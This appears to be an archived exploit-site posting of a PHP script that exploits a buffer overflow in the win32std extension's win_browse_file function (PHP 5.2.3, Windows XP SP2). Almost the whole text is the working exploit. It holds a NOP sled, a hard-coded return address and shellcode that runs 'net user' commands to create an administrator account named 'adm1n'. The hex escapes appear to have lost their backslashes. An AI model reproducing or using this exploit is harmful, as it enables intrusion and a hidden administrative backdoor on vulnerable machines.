Home / os / solaris

php523winbrowse-overflow.txt

Posted on 24 August 2007

<?php ########################################################## ###----------------------------------------------------### ###--------PHP win32std Buffer Overflow Exploit--------### ###----------------------------------------------------### ###-Tested on:-PHP 5.2.3-------------------------------### ###------------Windows XP SP2 Eng----------------------### ###----------------------------------------------------### ###-Note:-Shellcode is hard coded for Win XP SP2 Eng---### ###----------------------------------------------------### ###-Author:--NetJackal---------------------------------### ###-Email:---nima_501[at]yahoo[dot]com-----------------### ###-Website:-http://netjackal.by.ru--------------------### ###----------------------------------------------------### ########################################################## #Add user: [user]=>"adm1n" [password]=>"netjackal" $SC= "xEBx19x5Ax31xC0x50x88x42x52x52xBBx6Dx13x86". "x7CxFFxD3xBBxDAxCDx81x7Cx31xC0x50xFFxD3xE8". "xE2xFFxFFxFFx63x6Dx64x2Ex65x78x65x20x2Fx63". "x20x6Ex65x74x20x75x73x65x72x20x61x64x6Dx31". "x6Ex20x6Ex65x74x6Ax61x63x6Bx61x6Cx20x2Fx61". "x64x64x26x26x6Ex65x74x20x6Cx6Fx63x61x6Cx67". "x72x6Fx75x70x20x41x64x6Dx69x6Ex69x73x74x72". "x61x74x6Fx72x73x20x2Fx61x64x64x20x61x64x6D". "x31x6Ex58"; $RET="x70xE6x16x01"; $BOMB=str_repeat("x90",24).$SC.str_repeat("A",121).$RET; win_browse_file(1,NULL,$BOMB,NULL,array( "*" => "*.*")); ?>

 

TOP